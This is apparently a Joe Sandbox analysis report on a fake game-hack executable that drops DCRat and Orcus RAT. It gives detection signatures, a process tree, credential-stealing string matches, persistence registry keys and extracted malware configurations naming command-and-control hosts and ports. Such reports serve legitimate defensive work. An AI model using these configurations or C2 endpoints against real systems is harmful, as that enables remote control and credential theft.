Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GameHackBuild1.exe.bin.exe

Overview

General Information

Sample name:GameHackBuild1.exe.bin.exe
Analysis ID:1590018
MD5:35a0fbec2fc6d2a550a569719406d58d
SHA1:bc73001a0600313803d3594dc51d3d0813dbdec1
SHA256:221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
Tags:AgentTeslaDCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, Orcus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DCRat
Yara detected Orcus RAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GameHackBuild1.exe.bin.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe" MD5: 35A0FBEC2FC6D2A550A569719406D58D)
    • wscript.exe (PID: 7572 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • runtimesvc.exe (PID: 4920 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe" MD5: 00C4245522082B7F87721F9A26E96BA4)
          • csc.exe (PID: 8368 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 8376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 8460 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • MpDefenderProtector.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe" MD5: 10E817A4D5E216279A8DE8ED71C91044)
      • MpDefenderCoreProtion.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe" MD5: 10E817A4D5E216279A8DE8ED71C91044)
        • RegAsm.exe (PID: 5520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • GameHack.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe" MD5: BC7804FCA6DD09B4F16E86D80B8D28FA)
      • wscript.exe (PID: 7752 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 6896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • containerRuntime.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe" MD5: 52C95032FF8B8C3D4DFD98E51D8F6F58)
    • Solara.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe" MD5: E8C32CC88DB9FEF57FD9E2BB6D20F70B)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 7660 cmdline: wmic diskdrive get model,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • MpDefenderCoreProtion.exe (PID: 5456 cmdline: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe MD5: 10E817A4D5E216279A8DE8ED71C91044)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
Orcus RATOrcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-KJuu1JY0vqv02KLL4nsh", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Threatname: OrcusRAT

{"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "sudik", "TaskHighestPrivileges": "true", "AutoSteal": "true", "Inject": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Sudik", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2016-11-05T21:17:40"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": "GameHack"}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "25350.client.sudorat.top", "Port": "25350"}, {"Ip": "25350.client.sudorat.ru", "Port": "25350"}, {"Ip": "31.44.184.52", "Port": "25350"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "true"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET35"}, "HideFileBuilderProperty": {"HideFile": "true"}, "InstallationLocationBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\MpDefenderCoreProtion.exe"}, "InstallBuilderProperty": {"Install": "true"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "sudo_06kkh814g4vz7sfklrh1emcow75dz383"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "true", "TaskName": "MpDefenderProtector"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "true"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "aga.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeJoeSecurity_OrcusRatYara detected Orcus RATJ from THL <j@techhelplist.com> with thx to MalwareHunterTeam
      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeRAT_Orcusunknown J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
      • 0x2dc4a7:$text01: Orcus.CommandManagement
      • 0x2c91d6:$text02: Orcus.Commands.
      • 0x2ca141:$text02: Orcus.Commands.
      • 0x2cab44:$text02: Orcus.Commands.
      • 0x2cac77:$text02: Orcus.Commands.
      • 0x2cbcd3:$text02: Orcus.Commands.
      • 0x2cbd03:$text02: Orcus.Commands.
      • 0x2cbd31:$text02: Orcus.Commands.
      • 0x2cedd0:$text02: Orcus.Commands.
      • 0x2cefd2:$text02: Orcus.Commands.
      • 0x2cfe5a:$text02: Orcus.Commands.
      • 0x2d0a12:$text02: Orcus.Commands.
      • 0x2d10bd:$text02: Orcus.Commands.
      • 0x2d1158:$text02: Orcus.Commands.
      • 0x2d1294:$text02: Orcus.Commands.
      • 0x2d1d6b:$text02: Orcus.Commands.
      • 0x2d1e31:$text02: Orcus.Commands.
      • 0x2d1e6d:$text02: Orcus.Commands.
      • 0x2d1ead:$text02: Orcus.Commands.
      • 0x2d20cc:$text02: Orcus.Commands.
      • 0x2d2b0c:$text02: Orcus.Commands.
      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
      • 0x2ec750:$f1: FileZilla\recentservers.xml
      • 0x2ec284:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
      • 0x2ecae0:$b1: Chrome\User Data\
      • 0x2ecb4c:$b1: Chrome\User Data\
      • 0x2ecbfc:$b2: Mozilla\Firefox\Profiles
      • 0x2ec69c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2f57c7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2ec44a:$b4: Opera Software\Opera Stable\Login Data
      • 0x2ec178:$b5: YandexBrowser\User Data\
      • 0x2ec1e4:$b5: YandexBrowser\User Data\
      • 0x2ecb94:$s1: key3.db
      • 0x2eccbe:$s4: logins.json
      • 0x2ebcfc:$a1: username_value
      • 0x2ebd1a:$a2: password_value
      • 0x2d0710:$a3: encryptedUsername
      • 0x2ecd0a:$a3: encryptedUsername
      • 0x2ce9da:$a4: encryptedPassword
      • 0x2ecd2e:$a4: encryptedPassword
      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        Click to see the 3 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_OrcusRatYara detected Orcus RATJ from THL <j@techhelplist.com> with thx to MalwareHunterTeam
          00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpRAT_Orcusunknown J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
          • 0x1f84c7:$text01: Orcus.CommandManagement
          • 0x1e51f6:$text02: Orcus.Commands.
          • 0x1e6161:$text02: Orcus.Commands.
          • 0x1e6b64:$text02: Orcus.Commands.
          • 0x1e6c97:$text02: Orcus.Commands.
          • 0x1e7cf3:$text02: Orcus.Commands.
          • 0x1e7d23:$text02: Orcus.Commands.
          • 0x1e7d51:$text02: Orcus.Commands.
          • 0x1eadf0:$text02: Orcus.Commands.
          • 0x1eaff2:$text02: Orcus.Commands.
          • 0x1ebe7a:$text02: Orcus.Commands.
          • 0x1eca32:$text02: Orcus.Commands.
          • 0x1ed0dd:$text02: Orcus.Commands.
          • 0x1ed178:$text02: Orcus.Commands.
          • 0x1ed2b4:$text02: Orcus.Commands.
          • 0x1edd8b:$text02: Orcus.Commands.
          • 0x1ede51:$text02: Orcus.Commands.
          • 0x1ede8d:$text02: Orcus.Commands.
          • 0x1edecd:$text02: Orcus.Commands.
          • 0x1ee0ec:$text02: Orcus.Commands.
          • 0x1eeb2c:$text02: Orcus.Commands.
          0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                Click to see the 13 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                13.2.MpDefenderCoreProtion.exe.46090d0.6.unpackJoeSecurity_OrcusRatYara detected Orcus RATJ from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                  13.2.MpDefenderCoreProtion.exe.46090d0.6.unpackRAT_Orcusunknown J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                  • 0x2da6a7:$text01: Orcus.CommandManagement
                  • 0x2c73d6:$text02: Orcus.Commands.
                  • 0x2c8341:$text02: Orcus.Commands.
                  • 0x2c8d44:$text02: Orcus.Commands.
                  • 0x2c8e77:$text02: Orcus.Commands.
                  • 0x2c9ed3:$text02: Orcus.Commands.
                  • 0x2c9f03:$text02: Orcus.Commands.
                  • 0x2c9f31:$text02: Orcus.Commands.
                  • 0x2ccfd0:$text02: Orcus.Commands.
                  • 0x2cd1d2:$text02: Orcus.Commands.
                  • 0x2ce05a:$text02: Orcus.Commands.
                  • 0x2cec12:$text02: Orcus.Commands.
                  • 0x2cf2bd:$text02: Orcus.Commands.
                  • 0x2cf358:$text02: Orcus.Commands.
                  • 0x2cf494:$text02: Orcus.Commands.
                  • 0x2cff6b:$text02: Orcus.Commands.
                  • 0x2d0031:$text02: Orcus.Commands.
                  • 0x2d006d:$text02: Orcus.Commands.
                  • 0x2d00ad:$text02: Orcus.Commands.
                  • 0x2d02cc:$text02: Orcus.Commands.
                  • 0x2d0d0c:$text02: Orcus.Commands.
                  13.2.MpDefenderCoreProtion.exe.46090d0.6.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                  • 0x2ea950:$f1: FileZilla\recentservers.xml
                  • 0x2ea484:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                  • 0x2eace0:$b1: Chrome\User Data\
                  • 0x2ead4c:$b1: Chrome\User Data\
                  • 0x2eadfc:$b2: Mozilla\Firefox\Profiles
                  • 0x2ea89c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2f39c7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2ea64a:$b4: Opera Software\Opera Stable\Login Data
                  • 0x2ea378:$b5: YandexBrowser\User Data\
                  • 0x2ea3e4:$b5: YandexBrowser\User Data\
                  • 0x2ead94:$s1: key3.db
                  • 0x2eaebe:$s4: logins.json
                  • 0x2e9efc:$a1: username_value
                  • 0x2e9f1a:$a2: password_value
                  • 0x2ce910:$a3: encryptedUsername
                  • 0x2eaf0a:$a3: encryptedUsername
                  • 0x2ccbda:$a4: encryptedPassword
                  • 0x2eaf2e:$a4: encryptedPassword
                  23.2.runtimesvc.exe.1ba70000.5.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    23.2.runtimesvc.exe.1ba70000.5.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 8 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe, ProcessId: 7620, TargetFilename: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\PrintHood\SSblKNNQege.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSblKNNQege
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe", ParentImage: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe, ParentProcessId: 7292, ParentProcessName: GameHackBuild1.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , ProcessId: 7572, ProcessName: wscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Cursors\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
                      Sigma detected: CurrentVersion NT Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\msbuild\SSblKNNQege.exe", "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe", "C:\Windows\L2Schemas\SSblKNNQege.exe", "C:\Recovery\SSblKNNQege.exe", "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\SSblKNNQege.exe", "C:\Program Files\Windows Portable Devices\SSblKNNQege.exe", "C:\Users\All Users\WindowsHolographicDevices\SSblKNNQege.exe", "C:\Program Files (x86)\microsoft office\SSblKNNQege.exe", "C:\Users\Default\Pictures\RuntimeBroker.exe", "C:\Windows\Cursors\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe", ParentImage: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ParentProcessId: 4920, ParentProcessName: runtimesvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ProcessId: 8368, ProcessName: csc.exe
                      Sigma detected: Use Short Name Path in Command Line
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 8368, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP", ProcessId: 8460, ProcessName: cvtres.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe", ParentImage: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe, ParentProcessId: 7292, ParentProcessName: GameHackBuild1.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" , ProcessId: 7572, ProcessName: wscript.exe
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ProcessId: 4920, TargetFilename: C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe", ParentImage: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe, ParentProcessId: 4920, ParentProcessName: runtimesvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline", ProcessId: 8368, ProcessName: csc.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-13T13:35:58.469462+010020341941A Network Trojan was detected192.168.2.74985337.44.238.25080TCP
                      2025-01-13T13:36:13.751539+010020341941A Network Trojan was detected192.168.2.74990737.44.238.25080TCP
                      2025-01-13T13:36:34.528892+010020341941A Network Trojan was detected192.168.2.75001537.44.238.25080TCP
                      2025-01-13T13:37:23.993180+010020341941A Network Trojan was detected192.168.2.75003937.44.238.25080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-13T13:36:23.086316+010020480951A Network Trojan was detected192.168.2.74995637.44.238.25080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\Default\Pictures\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeAvira: detection malicious, Label: HEUR/AGEN.1309946
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
